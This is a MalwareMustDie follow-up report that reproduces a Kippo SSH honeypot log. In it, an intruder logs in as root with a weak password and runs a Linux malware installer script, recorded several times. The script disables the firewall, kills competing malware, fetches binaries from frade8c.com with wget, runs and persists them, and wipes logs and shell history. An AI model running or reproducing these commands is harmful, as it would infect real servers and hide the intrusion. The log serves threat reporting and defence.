1 | #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html | |
2 | #Follow-up report: still in the wild | |
3 | warning: live URLs | |
4 | ||
5 | #Reported log; | |
6 | ||
7 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded | |
8 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive | |
9 | 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection | |
10 | 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request | |
11 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open | |
12 | 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551] | |
13 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop | |
14 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
15 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
16 | apt-get -y install wget | |
17 | yum -y install wget | |
18 | chmod 7777 / etc | |
19 | killall -9 .IptabLes | |
20 | killall -9 nfsd4 | |
21 | killall -9 profild.key | |
22 | cd /etc;rm -rf dir fake.cfg | |
23 | killall -9 nfsd | |
24 | killall -9 DDosl | |
25 | killall -9 lengchao32 | |
26 | killall -9 b26 | |
27 | killall -9 khelper | |
28 | killall -9 Bill | |
29 | killall -9 n26 | |
30 | killall -9 007 | |
31 | killall -9 codelove | |
32 | killall -9 32 | |
33 | killall -9 m32 | |
34 | killall -9 m64 | |
35 | killall -9 64 | |
36 | killall -9 83BOT | |
37 | killall -9 82BOT | |
38 | killall -9 dos64 | |
39 | killall -9 dos32 | |
40 | killall -9 new6 | |
41 | killall -9 new4 | |
42 | killall -9 node24 | |
43 | killall -9 mimi | |
44 | killall -9 nodeJR-1 | |
45 | killall -9 freeBSD | |
46 | killall -9 ksapdd | |
47 | killall -9 106 | |
48 | killall -9 09 | |
49 | killall -9 xsw | |
50 | killall -9 syslogd | |
51 | killall -9 skysapdd | |
52 | killall -9 cupsddd | |
53 | killall -9 ksapd | |
54 | killall -9 atddd | |
55 | killall -9 xfsdxd | |
56 | killall -9 sfewfesfs | |
57 | killall -9 gfhjrtfyhuf | |
58 | killall -9 rewgtf3er4t | |
59 | killall -9 fdsfsfvff | |
60 | killall -9 smarvtd | |
61 | killall -9 whitptabil | |
62 | killall -9 gdmorpen | |
63 | cd /etc;chattr -i 66 | |
64 | cd /root; chmod 7777 / etc | |
65 | killall -9 minerd | |
66 | killall -9 syn | |
67 | killall -9 joudckfr | |
68 | killall -9 www | |
69 | killall -9 log | |
70 | killall -9 .IptabLes | |
71 | killall -9 .IptabLex | |
72 | killall -9 .Mm2 | |
73 | killall -9 acpid | |
74 | killall -9 m64 | |
75 | killall -9 ./QQ | |
76 | killall -9 aabb | |
77 | killall -9 g3 | |
78 | killall -9 S99local | |
79 | killall -9 3 | |
80 | killall -9 pm | |
81 | killall -9 qweasd | |
82 | killall -9 tangtang | |
83 | killall -9 imap-login | |
84 | killall -9 xudp | |
85 | killall -9 sshpa | |
86 | killall -9 008 | |
87 | killall -9 txma | |
88 | killall -9 mrdos64.b00 | |
89 | killall -9 mrdos32.b00 | |
90 | killall -9 kkpklp | |
91 | killall -9 kiilp | |
92 | killall -9 xin1 | |
93 | killall -9 jibateng | |
94 | killall -9 syscore.sh | |
95 | killall -9 syscore.sh | |
96 | killall -9 syscore.sh | |
97 | killall -9 .mimeo | |
98 | killall -9 .mimeo | |
99 | killall -9 .mimeo | |
100 | killall -9 .mimeop | |
101 | killall -9 .task1 | |
102 | killall -9 .mimeop | |
103 | killall -9 .IptabLes | |
104 | killall -9 .IptabLex | |
105 | killall -9 .IptabLes | |
106 | killall -9 .IptabLex | |
107 | killall -9 .IptabLes | |
108 | killall -9 .IptabLex | |
109 | killall -9 .IptabLes | |
110 | killall -9 .IptabLex | |
111 | cd /root;rm -rf dir nohup.out | |
112 | cd /etc;rm -rf dir fake.cfg | |
113 | cd /etc;rm -rf dir cupsddd.* | |
114 | cd /etc;rm -rf dir atddd.* | |
115 | cd /etc;rm -rf dir ksapdd.* | |
116 | cd /etc;rm -rf dir kysapdd.* | |
117 | cd /etc;rm -rf dir sksapdd.* | |
118 | cd /etc;rm -rf dir skysapdd.* | |
119 | cd /etc;rm -rf dir xfsdxd.* | |
120 | cd /etc;rm -rf dir fake.cfg | |
121 | cd /etc;rm -rf dir cupsdd.* | |
122 | cd /etc;rm -rf dir atdd.* | |
123 | cd /etc;rm -rf dir ksapd.* | |
124 | cd /etc;rm -rf dir kysapd.* | |
125 | cd /etc;rm -rf dir sksapd.* | |
126 | cd /etc;rm -rf dir skysapd.* | |
127 | cd /etc;rm -rf dir xfsdx.* | |
128 | cd /etc;rm -rf dir sfewfesfs | |
129 | cd /etc;rm -rf dir gfhjrtfyhuf | |
130 | cd /etc;rm -rf dir rewgtf3er4t | |
131 | cd /etc;rm -rf dir fdsfsfvff | |
132 | cd /etc;rm -rf dir smarvtd | |
133 | cd /etc;rm -rf dir whitptabil | |
134 | cd /etc;rm -rf dir gdmorpen | |
135 | cd /etc;rm -rf dir sfewfesfs.* | |
136 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
137 | cd /etc;rm -rf dir rewgtf3er4t.* | |
138 | cd /etc;rm -rf dir fdsfsfvff.* | |
139 | cd /etc;rm -rf dir smarvtd.* | |
140 | cd /etc;rm -rf dir whitptabil.* | |
141 | cd /etc;rm -rf dir gdmorpen.* | |
142 | cd /etc;rm -rf dir nhgbhhj.* | |
143 | cd /tmp;rm -rf dir 1.* | |
144 | cd /tmp;rm -rf dir 2.* | |
145 | cd /tmp;rm -rf dir 3.* | |
146 | cd /tmp;rm -rf dir 4.* | |
147 | cd /tmp;rm -rf dir 5.* | |
148 | cd /tmp;rm -rf dir jdhe | |
149 | cd /tmp;rm -rf dir jdhe.* | |
150 | cd /var/spool/cron; rm -rf dir root.* | |
151 | cd /var/spool/cron; rm -rf dir root | |
152 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
153 | cd /var/spool/cron/crontabs; rm -rf dir root | |
154 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
155 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
156 | yes|mv /tmp/root /var/spool/cron | |
157 | yes|mv /tmp/root /var/spool/cron/crontabs | |
158 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
159 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
160 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
161 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
162 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
163 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
164 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
165 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
166 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
167 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
168 | cd /tmp;chmod 7777 jdhe | |
169 | cd /etc;chmod 7777 nhgbhhj | |
170 | cd /etc;chmod 7777 byv832 | |
171 | cd /etc;chmod 7777 sfewfesfs | |
172 | cd /etc;chmod 7777 gfhjrtfyhuf | |
173 | cd /etc;chmod 7777 rewgtf3er4t | |
174 | cd /etc;chmod 7777 fdsfsfvff | |
175 | cd /etc;chmod 7777 smarvtd | |
176 | cd /etc;chmod 7777 whitptabil | |
177 | cd /etc;chmod 7777 gdmorpen | |
178 | cd /tmp;chmod 7777 nhgbhhj | |
179 | cd /tmp;chmod 7777 byv832 | |
180 | cd /tmp;chmod 7777 sfewfesfs | |
181 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
182 | cd /tmp;chmod 7777 rewgtf3er4t | |
183 | cd /tmp;chmod 7777 fdsfsfvff | |
184 | cd /tmp;chmod 7777 smarvtd | |
185 | cd /tmp;chmod 7777 whitptabil | |
186 | cd /tmp;chmod 7777 gdmorpen | |
187 | cd /tmp;./jdhe | |
188 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
189 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
190 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
191 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
192 | nohup /etc/smarvtd > /dev/null 2>&1& | |
193 | nohup /etc/whitptabil > /dev/null 2>&1& | |
194 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
195 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
196 | nohup /etc/byv832 > /dev/null 2>&1& | |
197 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
198 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
199 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
200 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
201 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
202 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
203 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
204 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
205 | nohup /tmp/byv832 > /dev/null 2>&1& | |
206 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
207 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
208 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
209 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
210 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
211 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
212 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
213 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
214 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
215 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
216 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
217 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
218 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
219 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
220 | echo "unset MAILCHECK" >> /etc/profile | |
221 | cd /etc;chattr +i sfewfesfs | |
222 | rm -rf /root/.bash_history | |
223 | touch /root/.bash_history | |
224 | history -r | |
225 | cd /var/log > dmesg | |
226 | cd /var/log > auth.log | |
227 | cd /var/log > alternatives.log | |
228 | cd /var/log > boot.log | |
229 | cd /var/log > btmp | |
230 | cd /var/log > cron | |
231 | cd /var/log > cups | |
232 | cd /var/log > daemon.log | |
233 | cd /var/log > dpkg.log | |
234 | cd /var/log > faillog | |
235 | cd /var/log > kern.log | |
236 | cd /var/log > lastlog | |
237 | cd /var/log > maillog | |
238 | cd /var/log > user.log | |
239 | cd /var/log > Xorg.x.log | |
240 | cd /var/log > anaconda.log | |
241 | cd /var/log > yum.log | |
242 | cd /var/log > secure | |
243 | cd /var/log > wtmp | |
244 | cd /var/log > utmp | |
245 | cd /var/log > messages | |
246 | cd /var/log > spooler | |
247 | cd /var/log > sudolog | |
248 | cd /var/log > aculog | |
249 | cd /var/log > access-log | |
250 | cd /root > .bash_history | |
251 | history -c" | |
252 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop | |
253 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
254 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
255 | apt-get -y install wget | |
256 | yum -y install wget | |
257 | chmod 7777 / etc | |
258 | killall -9 .IptabLes | |
259 | killall -9 nfsd4 | |
260 | killall -9 profild.key | |
261 | cd /etc;rm -rf dir fake.cfg | |
262 | killall -9 nfsd | |
263 | killall -9 DDosl | |
264 | killall -9 lengchao32 | |
265 | killall -9 b26 | |
266 | killall -9 khelper | |
267 | killall -9 Bill | |
268 | killall -9 n26 | |
269 | killall -9 007 | |
270 | killall -9 codelove | |
271 | killall -9 32 | |
272 | killall -9 m32 | |
273 | killall -9 m64 | |
274 | killall -9 64 | |
275 | killall -9 83BOT | |
276 | killall -9 82BOT | |
277 | killall -9 dos64 | |
278 | killall -9 dos32 | |
279 | killall -9 new6 | |
280 | killall -9 new4 | |
281 | killall -9 node24 | |
282 | killall -9 mimi | |
283 | killall -9 nodeJR-1 | |
284 | killall -9 freeBSD | |
285 | killall -9 ksapdd | |
286 | killall -9 106 | |
287 | killall -9 09 | |
288 | killall -9 xsw | |
289 | killall -9 syslogd | |
290 | killall -9 skysapdd | |
291 | killall -9 cupsddd | |
292 | killall -9 ksapd | |
293 | killall -9 atddd | |
294 | killall -9 xfsdxd | |
295 | killall -9 sfewfesfs | |
296 | killall -9 gfhjrtfyhuf | |
297 | killall -9 rewgtf3er4t | |
298 | killall -9 fdsfsfvff | |
299 | killall -9 smarvtd | |
300 | killall -9 whitptabil | |
301 | killall -9 gdmorpen | |
302 | cd /etc;chattr -i 66 | |
303 | cd /root; chmod 7777 / etc | |
304 | killall -9 minerd | |
305 | killall -9 syn | |
306 | killall -9 joudckfr | |
307 | killall -9 www | |
308 | killall -9 log | |
309 | killall -9 .IptabLes | |
310 | killall -9 .IptabLex | |
311 | killall -9 .Mm2 | |
312 | killall -9 acpid | |
313 | killall -9 m64 | |
314 | killall -9 ./QQ | |
315 | killall -9 aabb | |
316 | killall -9 g3 | |
317 | killall -9 S99local | |
318 | killall -9 3 | |
319 | killall -9 pm | |
320 | killall -9 qweasd | |
321 | killall -9 tangtang | |
322 | killall -9 imap-login | |
323 | killall -9 xudp | |
324 | killall -9 sshpa | |
325 | killall -9 008 | |
326 | killall -9 txma | |
327 | killall -9 mrdos64.b00 | |
328 | killall -9 mrdos32.b00 | |
329 | killall -9 kkpklp | |
330 | killall -9 kiilp | |
331 | killall -9 xin1 | |
332 | killall -9 jibateng | |
333 | killall -9 syscore.sh | |
334 | killall -9 syscore.sh | |
335 | killall -9 syscore.sh | |
336 | killall -9 .mimeo | |
337 | killall -9 .mimeo | |
338 | killall -9 .mimeo | |
339 | killall -9 .mimeop | |
340 | killall -9 .task1 | |
341 | killall -9 .mimeop | |
342 | killall -9 .IptabLes | |
343 | killall -9 .IptabLex | |
344 | killall -9 .IptabLes | |
345 | killall -9 .IptabLex | |
346 | killall -9 .IptabLes | |
347 | killall -9 .IptabLex | |
348 | killall -9 .IptabLes | |
349 | killall -9 .IptabLex | |
350 | cd /root;rm -rf dir nohup.out | |
351 | cd /etc;rm -rf dir fake.cfg | |
352 | cd /etc;rm -rf dir cupsddd.* | |
353 | cd /etc;rm -rf dir atddd.* | |
354 | cd /etc;rm -rf dir ksapdd.* | |
355 | cd /etc;rm -rf dir kysapdd.* | |
356 | cd /etc;rm -rf dir sksapdd.* | |
357 | cd /etc;rm -rf dir skysapdd.* | |
358 | cd /etc;rm -rf dir xfsdxd.* | |
359 | cd /etc;rm -rf dir fake.cfg | |
360 | cd /etc;rm -rf dir cupsdd.* | |
361 | cd /etc;rm -rf dir atdd.* | |
362 | cd /etc;rm -rf dir ksapd.* | |
363 | cd /etc;rm -rf dir kysapd.* | |
364 | cd /etc;rm -rf dir sksapd.* | |
365 | cd /etc;rm -rf dir skysapd.* | |
366 | cd /etc;rm -rf dir xfsdx.* | |
367 | cd /etc;rm -rf dir sfewfesfs | |
368 | cd /etc;rm -rf dir gfhjrtfyhuf | |
369 | cd /etc;rm -rf dir rewgtf3er4t | |
370 | cd /etc;rm -rf dir fdsfsfvff | |
371 | cd /etc;rm -rf dir smarvtd | |
372 | cd /etc;rm -rf dir whitptabil | |
373 | cd /etc;rm -rf dir gdmorpen | |
374 | cd /etc;rm -rf dir sfewfesfs.* | |
375 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
376 | cd /etc;rm -rf dir rewgtf3er4t.* | |
377 | cd /etc;rm -rf dir fdsfsfvff.* | |
378 | cd /etc;rm -rf dir smarvtd.* | |
379 | cd /etc;rm -rf dir whitptabil.* | |
380 | cd /etc;rm -rf dir gdmorpen.* | |
381 | cd /etc;rm -rf dir nhgbhhj.* | |
382 | cd /tmp;rm -rf dir 1.* | |
383 | cd /tmp;rm -rf dir 2.* | |
384 | cd /tmp;rm -rf dir 3.* | |
385 | cd /tmp;rm -rf dir 4.* | |
386 | cd /tmp;rm -rf dir 5.* | |
387 | cd /tmp;rm -rf dir jdhe | |
388 | cd /tmp;rm -rf dir jdhe.* | |
389 | cd /var/spool/cron; rm -rf dir root.* | |
390 | cd /var/spool/cron; rm -rf dir root | |
391 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
392 | cd /var/spool/cron/crontabs; rm -rf dir root | |
393 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
394 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
395 | yes|mv /tmp/root /var/spool/cron | |
396 | yes|mv /tmp/root /var/spool/cron/crontabs | |
397 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
398 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
399 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
400 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
401 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
402 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
403 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
404 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
405 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
406 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
407 | cd /tmp;chmod 7777 jdhe | |
408 | cd /etc;chmod 7777 nhgbhhj | |
409 | cd /etc;chmod 7777 byv832 | |
410 | cd /etc;chmod 7777 sfewfesfs | |
411 | cd /etc;chmod 7777 gfhjrtfyhuf | |
412 | cd /etc;chmod 7777 rewgtf3er4t | |
413 | cd /etc;chmod 7777 fdsfsfvff | |
414 | cd /etc;chmod 7777 smarvtd | |
415 | cd /etc;chmod 7777 whitptabil | |
416 | cd /etc;chmod 7777 gdmorpen | |
417 | cd /tmp;chmod 7777 nhgbhhj | |
418 | cd /tmp;chmod 7777 byv832 | |
419 | cd /tmp;chmod 7777 sfewfesfs | |
420 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
421 | cd /tmp;chmod 7777 rewgtf3er4t | |
422 | cd /tmp;chmod 7777 fdsfsfvff | |
423 | cd /tmp;chmod 7777 smarvtd | |
424 | cd /tmp;chmod 7777 whitptabil | |
425 | cd /tmp;chmod 7777 gdmorpen | |
426 | cd /tmp;./jdhe | |
427 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
428 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
429 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
430 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
431 | nohup /etc/smarvtd > /dev/null 2>&1& | |
432 | nohup /etc/whitptabil > /dev/null 2>&1& | |
433 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
434 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
435 | nohup /etc/byv832 > /dev/null 2>&1& | |
436 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
437 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
438 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
439 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
440 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
441 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
442 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
443 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
444 | nohup /tmp/byv832 > /dev/null 2>&1& | |
445 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
446 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
447 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
448 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
449 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
450 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
451 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
452 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
453 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
454 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
455 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
456 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
457 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
458 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
459 | echo "unset MAILCHECK" >> /etc/profile | |
460 | cd /etc;chattr +i sfewfesfs | |
461 | rm -rf /root/.bash_history | |
462 | touch /root/.bash_history | |
463 | history -r | |
464 | cd /var/log > dmesg | |
465 | cd /var/log > auth.log | |
466 | cd /var/log > alternatives.log | |
467 | cd /var/log > boot.log | |
468 | cd /var/log > btmp | |
469 | cd /var/log > cron | |
470 | cd /var/log > cups | |
471 | cd /var/log > daemon.log | |
472 | cd /var/log > dpkg.log | |
473 | cd /var/log > faillog | |
474 | cd /var/log > kern.log | |
475 | cd /var/log > lastlog | |
476 | cd /var/log > maillog | |
477 | cd /var/log > user.log | |
478 | cd /var/log > Xorg.x.log | |
479 | cd /var/log > anaconda.log | |
480 | cd /var/log > yum.log | |
481 | cd /var/log > secure | |
482 | cd /var/log > wtmp | |
483 | cd /var/log > utmp | |
484 | cd /var/log > messages | |
485 | cd /var/log > spooler | |
486 | cd /var/log > sudolog | |
487 | cd /var/log > aculog | |
488 | cd /var/log > access-log | |
489 | cd /root > .bash_history | |
490 | history -c" | |
491 | 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log | |
492 | 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop | |
493 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
494 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
495 | apt-get -y install wget | |
496 | yum -y install wget | |
497 | chmod 7777 / etc | |
498 | killall -9 .IptabLes | |
499 | killall -9 nfsd4 | |
500 | killall -9 profild.key | |
501 | cd /etc;rm -rf dir fake.cfg | |
502 | killall -9 nfsd | |
503 | killall -9 DDosl | |
504 | killall -9 lengchao32 | |
505 | killall -9 b26 | |
506 | killall -9 khelper | |
507 | killall -9 Bill | |
508 | killall -9 n26 | |
509 | killall -9 007 | |
510 | killall -9 codelove | |
511 | killall -9 32 | |
512 | killall -9 m32 | |
513 | killall -9 m64 | |
514 | killall -9 64 | |
515 | killall -9 83BOT | |
516 | killall -9 82BOT | |
517 | killall -9 dos64 | |
518 | killall -9 dos32 | |
519 | killall -9 new6 | |
520 | killall -9 new4 | |
521 | killall -9 node24 | |
522 | killall -9 mimi | |
523 | killall -9 nodeJR-1 | |
524 | killall -9 freeBSD | |
525 | killall -9 ksapdd | |
526 | killall -9 106 | |
527 | killall -9 09 | |
528 | killall -9 xsw | |
529 | killall -9 syslogd | |
530 | killall -9 skysapdd | |
531 | killall -9 cupsddd | |
532 | killall -9 ksapd | |
533 | killall -9 atddd | |
534 | killall -9 xfsdxd | |
535 | killall -9 sfewfesfs | |
536 | killall -9 gfhjrtfyhuf | |
537 | killall -9 rewgtf3er4t | |
538 | killall -9 fdsfsfvff | |
539 | killall -9 smarvtd | |
540 | killall -9 whitptabil | |
541 | killall -9 gdmorpen | |
542 | cd /etc;chattr -i 66 | |
543 | cd /root; chmod 7777 / etc | |
544 | killall -9 minerd | |
545 | killall -9 syn | |
546 | killall -9 joudckfr | |
547 | killall -9 www | |
548 | killall -9 log | |
549 | killall -9 .IptabLes | |
550 | killall -9 .IptabLex | |
551 | killall -9 .Mm2 | |
552 | killall -9 acpid | |
553 | killall -9 m64 | |
554 | killall -9 ./QQ | |
555 | killall -9 aabb | |
556 | killall -9 g3 | |
557 | killall -9 S99local | |
558 | killall -9 3 | |
559 | killall -9 pm | |
560 | killall -9 qweasd | |
561 | killall -9 tangtang | |
562 | killall -9 imap-login | |
563 | killall -9 xudp | |
564 | killall -9 sshpa | |
565 | killall -9 008 | |
566 | killall -9 txma | |
567 | killall -9 mrdos64.b00 | |
568 | killall -9 mrdos32.b00 | |
569 | killall -9 kkpklp | |
570 | killall -9 kiilp | |
571 | killall -9 xin1 | |
572 | killall -9 jibateng | |
573 | killall -9 syscore.sh | |
574 | killall -9 syscore.sh | |
575 | killall -9 syscore.sh | |
576 | killall -9 .mimeo | |
577 | killall -9 .mimeo | |
578 | killall -9 .mimeo | |
579 | killall -9 .mimeop | |
580 | killall -9 .task1 | |
581 | killall -9 .mimeop | |
582 | killall -9 .IptabLes | |
583 | killall -9 .IptabLex | |
584 | killall -9 .IptabLes | |
585 | killall -9 .IptabLex | |
586 | killall -9 .IptabLes | |
587 | killall -9 .IptabLex | |
588 | killall -9 .IptabLes | |
589 | killall -9 .IptabLex | |
590 | cd /root;rm -rf dir nohup.out | |
591 | cd /etc;rm -rf dir fake.cfg | |
592 | cd /etc;rm -rf dir cupsddd.* | |
593 | cd /etc;rm -rf dir atddd.* | |
594 | cd /etc;rm -rf dir ksapdd.* | |
595 | cd /etc;rm -rf dir kysapdd.* | |
596 | cd /etc;rm -rf dir sksapdd.* | |
597 | cd /etc;rm -rf dir skysapdd.* | |
598 | cd /etc;rm -rf dir xfsdxd.* | |
599 | cd /etc;rm -rf dir fake.cfg | |
600 | cd /etc;rm -rf dir cupsdd.* | |
601 | cd /etc;rm -rf dir atdd.* | |
602 | cd /etc;rm -rf dir ksapd.* | |
603 | cd /etc;rm -rf dir kysapd.* | |
604 | cd /etc;rm -rf dir sksapd.* | |
605 | cd /etc;rm -rf dir skysapd.* | |
606 | cd /etc;rm -rf dir xfsdx.* | |
607 | cd /etc;rm -rf dir sfewfesfs | |
608 | cd /etc;rm -rf dir gfhjrtfyhuf | |
609 | cd /etc;rm -rf dir rewgtf3er4t | |
610 | cd /etc;rm -rf dir fdsfsfvff | |
611 | cd /etc;rm -rf dir smarvtd | |
612 | cd /etc;rm -rf dir whitptabil | |
613 | cd /etc;rm -rf dir gdmorpen | |
614 | cd /etc;rm -rf dir sfewfesfs.* | |
615 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
616 | cd /etc;rm -rf dir rewgtf3er4t.* | |
617 | cd /etc;rm -rf dir fdsfsfvff.* | |
618 | cd /etc;rm -rf dir smarvtd.* | |
619 | cd /etc;rm -rf dir whitptabil.* | |
620 | cd /etc;rm -rf dir gdmorpen.* | |
621 | cd /etc;rm -rf dir nhgbhhj.* | |
622 | cd /tmp;rm -rf dir 1.* | |
623 | cd /tmp;rm -rf dir 2.* | |
624 | cd /tmp;rm -rf dir 3.* | |
625 | cd /tmp;rm -rf dir 4.* | |
626 | cd /tmp;rm -rf dir 5.* | |
627 | cd /tmp;rm -rf dir jdhe | |
628 | cd /tmp;rm -rf dir jdhe.* | |
629 | cd /var/spool/cron; rm -rf dir root.* | |
630 | cd /var/spool/cron; rm -rf dir root | |
631 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
632 | cd /var/spool/cron/crontabs; rm -rf dir root | |
633 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
634 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
635 | yes|mv /tmp/root /var/spool/cron | |
636 | yes|mv /tmp/root /var/spool/cron/crontabs | |
637 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
638 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
639 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
640 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
641 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
642 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
643 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
644 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
645 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj | |
646 | cd /etc;wget -c http://www.frade8c.com:9162/byv832 | |
647 | cd /tmp;chmod 7777 jdhe | |
648 | cd /etc;chmod 7777 nhgbhhj | |
649 | cd /etc;chmod 7777 byv832 | |
650 | cd /etc;chmod 7777 sfewfesfs | |
651 | cd /etc;chmod 7777 gfhjrtfyhuf | |
652 | cd /etc;chmod 7777 rewgtf3er4t | |
653 | cd /etc;chmod 7777 fdsfsfvff | |
654 | cd /etc;chmod 7777 smarvtd | |
655 | cd /etc;chmod 7777 whitptabil | |
656 | cd /etc;chmod 7777 gdmorpen | |
657 | cd /tmp;chmod 7777 nhgbhhj | |
658 | cd /tmp;chmod 7777 byv832 | |
659 | cd /tmp;chmod 7777 sfewfesfs | |
